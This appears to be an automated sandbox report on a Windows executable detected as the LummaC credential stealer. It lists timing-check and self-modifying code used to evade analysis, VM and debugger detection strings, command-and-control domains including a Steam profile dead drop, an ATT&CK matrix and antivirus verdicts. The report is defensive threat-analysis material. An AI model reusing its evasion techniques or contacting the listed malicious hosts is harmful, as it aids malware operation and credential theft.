      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 34A04B second address: 34A050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 34A050 second address: 34A07B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 jmp 00007FA4591E8380h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FA4591E837Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 349A8D second address: 349A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 349A93 second address: 349AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FA4591E837Eh 0x0000000b jnc 00007FA4591E8376h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 jbe 00007FA4591E8391h 0x0000001b jno 00007FA4591E8376h 0x00000021 jmp 00007FA4591E8385h 0x00000026 jo 00007FA4591E837Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 34CB1C second address: 34CB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jnl 00007FA458C36916h 0x0000000d jmp 00007FA458C36921h 0x00000012 popad 0x00000013 pushad 0x00000014 jo 00007FA458C36916h 0x0000001a jg 00007FA458C36916h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 34CB4A second address: 34CB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 34CB50 second address: 34CB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007FA458C36916h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3533C6 second address: 3533CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3533CA second address: 3533CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3533CE second address: 3533D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 355636 second address: 35564E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA458C36916h 0x0000000a popad 0x0000000b jng 00007FA458C3691Ah 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3663DB second address: 366401 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA4591E837Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA4591E837Bh 0x00000012 jnl 00007FA4591E8376h 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 367CD1 second address: 367CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 36954E second address: 36955A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA4591E8376h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 36955A second address: 36955E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 36955E second address: 36956A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 36956A second address: 36956E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 370291 second address: 3702C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E837Bh 0x00000007 jmp 00007FA4591E8386h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FA4591E8382h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3702C8 second address: 3702F2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA458C36925h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FA458C3691Dh 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3702F2 second address: 3702F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3702F8 second address: 370300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 36EE81 second address: 36EE89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 36F0EC second address: 36F112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA458C3691Eh 0x00000009 jmp 00007FA458C36922h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 36F112 second address: 36F11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 36F11B second address: 36F121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 36F54E second address: 36F583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a je 00007FA4591E8376h 0x00000010 jno 00007FA4591E8376h 0x00000016 jno 00007FA4591E8376h 0x0000001c jmp 00007FA4591E8384h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 36F583 second address: 36F587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 36FF87 second address: 36FF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jg 00007FA4591E8376h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 36FF9C second address: 36FFA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 36FFA0 second address: 36FFA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 36FFA6 second address: 36FFAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 377F1F second address: 377F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 377F23 second address: 377F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 377F27 second address: 377F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA4591E8376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FA4591E8376h 0x00000014 jmp 00007FA4591E8385h 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 377F50 second address: 377F5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 377F5A second address: 377F64 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA4591E8376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 377D9F second address: 377DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 377DA3 second address: 377DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 26DCC5 second address: 26DCDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA458C36916h 0x0000000a jmp 00007FA458C3691Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 384CF4 second address: 384CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 384CF9 second address: 384CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3871A6 second address: 3871C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FA4591E8386h 0x0000000c jnp 00007FA4591E8376h 0x00000012 jmp 00007FA4591E837Ah 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 393388 second address: 3933A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA458C36924h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3933A0 second address: 3933A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3933A6 second address: 3933BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA458C36922h 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3AB664 second address: 3AB670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FA4591E8376h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3AA92A second address: 3AA930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3AA930 second address: 3AA935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3AB212 second address: 3AB219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3AB356 second address: 3AB381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4591E8382h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FA4591E8381h 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3AB381 second address: 3AB397 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA458C3691Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3AE1D1 second address: 3AE1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3AE26F second address: 3AE274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3AE52D second address: 3AE531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3AF81D second address: 3AF829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FA458C36916h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3B160A second address: 3B163A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA4591E839Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 3B163A second address: 3B164F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA458C36921h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B9D26 second address: 2B9D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2B9D2A second address: 2B9D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FA458C36916h 0x0000000a rdtsc
      Tries to evade debugger and weak emulator (self modifying code)
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSpecial instruction interceptor: First address: 2B0B75 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSpecial instruction interceptor: First address: 1065A2 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSpecial instruction interceptor: First address: 2D5E8D instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSpecial instruction interceptor: First address: 33FCC4 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00109158 rdtsc 0_2_00109158
      Source: C:\Users\user\Desktop\35K4Py4lii.exe TID: 7828Thread sleep time: -150000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exe TID: 7828Thread sleep time: -30000s >= -30000sJump to behavior
      Source: 35K4Py4lii.exe, 35K4Py4lii.exe, 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001567000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378297153.00000000015B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: 35K4Py4lii.exe, 00000000.00000002.1378297153.00000000015A6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWsslc
      Source: 35K4Py4lii.exe, 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\35K4Py4lii.exeThread information set: HideFromDebuggerJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (window names)
      Source: C:\Users\user\Desktop\35K4Py4lii.exeOpen window title or class name: regmonclass
      Source: C:\Users\user\Desktop\35K4Py4lii.exeOpen window title or class name: gbdyllo
      Source: C:\Users\user\Desktop\35K4Py4lii.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\35K4Py4lii.exeOpen window title or class name: procmon_window_class
      Source: C:\Users\user\Desktop\35K4Py4lii.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\35K4Py4lii.exeOpen window title or class name: ollydbg
      Source: C:\Users\user\Desktop\35K4Py4lii.exeOpen window title or class name: filemonclass
      Source: C:\Users\user\Desktop\35K4Py4lii.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\35K4Py4lii.exeFile opened: NTICE
      Source: C:\Users\user\Desktop\35K4Py4lii.exeFile opened: SICE
      Source: C:\Users\user\Desktop\35K4Py4lii.exeFile opened: SIWVID
      Source: C:\Users\user\Desktop\35K4Py4lii.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00109158 rdtsc 0_2_00109158
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000EE110 LdrInitializeThunk,0_2_000EE110

      HIPS / PFW / Operating System Protection Evasion

      barindex
      LummaC encrypted strings found
      Source: 35K4Py4lii.exeString found in binary or memory: bashfulacid.lat
      Source: 35K4Py4lii.exeString found in binary or memory: tentabatte.lat
      Source: 35K4Py4lii.exeString found in binary or memory: curverpluch.lat
      Source: 35K4Py4lii.exeString found in binary or memory: talkynicer.lat
      Source: 35K4Py4lii.exeString found in binary or memory: shapestickyr.lat
      Source: 35K4Py4lii.exeString found in binary or memory: manyrestro.lat
      Source: 35K4Py4lii.exeString found in binary or memory: slipperyloo.lat
      Source: 35K4Py4lii.exeString found in binary or memory: wordyfindy.lat
      Source: 35K4Py4lii.exeString found in binary or memory: observerfry.lat
      Source: 35K4Py4lii.exe, 35K4Py4lii.exe, 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
      Source: C:\Users\user\Desktop\35K4Py4lii.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Command and Scripting Interpreter      		1
      DLL Side-Loading      		1
      Process Injection      		24
      Virtualization/Sandbox Evasion      		OS Credential Dumping641
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Process Injection      		LSASS Memory24
      Virtualization/Sandbox Evasion      		Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Deobfuscate/Decode Files or Information      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
      Obfuscated Files or Information      		NTDS23
      System Information Discovery      		Distributed Component Object ModelInput Capture114
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
      Software Packing      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      35K4Py4lii.exe54%VirustotalBrowse
      35K4Py4lii.exe61%ReversingLabsWin32.Trojan.Symmi
      35K4Py4lii.exe100%AviraTR/Crypt.XPACK.Gen
      35K4Py4lii.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://lev-tolstoi.com/d100%Avira URL Cloudmalware
      https://steambroadcast-test.akamaized0%Avira URL Cloudsafe
      https://lev-tolstoi.com/j100%Avira URL Cloudmalware
      https://login.steamp0%Avira URL Cloudsafe
      https://community.10%Avira URL Cloudsafe
      https://lev-tolstoi.com/900100%Avira URL Cloudmalware
      https://checkout.steampow0%Avira URL Cloudsafe
      https://lev-tolstoi.com/api/100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      steamcommunity.com
      		23.55.153.106
      		truefalse
        		high
        lev-tolstoi.com
        		104.21.66.86
        		truefalse
          		high
          wordyfindy.lat
          		unknown
          		unknownfalse
            		high
            slipperyloo.lat
            		unknown
            		unknowntrue
              		unknown
              curverpluch.lat
              		unknown
              		unknowntrue
                		unknown
                tentabatte.lat
                		unknown
                		unknowntrue
                  		unknown
                  manyrestro.lat
                  		unknown
                  		unknowntrue
                    		unknown
                    bashfulacid.lat
                    		unknown
                    		unknowntrue
                      		unknown
                      shapestickyr.lat
                      		unknown
                      		unknowntrue
                        		unknown
                        observerfry.lat
                        		unknown
                        		unknownfalse
                          		high
                          talkynicer.lat
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            slipperyloo.latfalse
                              		high
                              observerfry.latfalse
                                		high
                                https://steamcommunity.com/profiles/76561199724331900false
                                  		high
                                  https://lev-tolstoi.com/apifalse
                                    		high
                                    curverpluch.latfalse
                                      		high
                                      tentabatte.latfalse
                                        		high
                                        manyrestro.latfalse
                                          		high
                                          bashfulacid.latfalse
                                            		high
                                            wordyfindy.latfalse
                                              		high
                                              shapestickyr.latfalse
                                                		high
                                                talkynicer.latfalse
                                                  		high

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://steamcommunity.com/?subsection=broadcasts35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
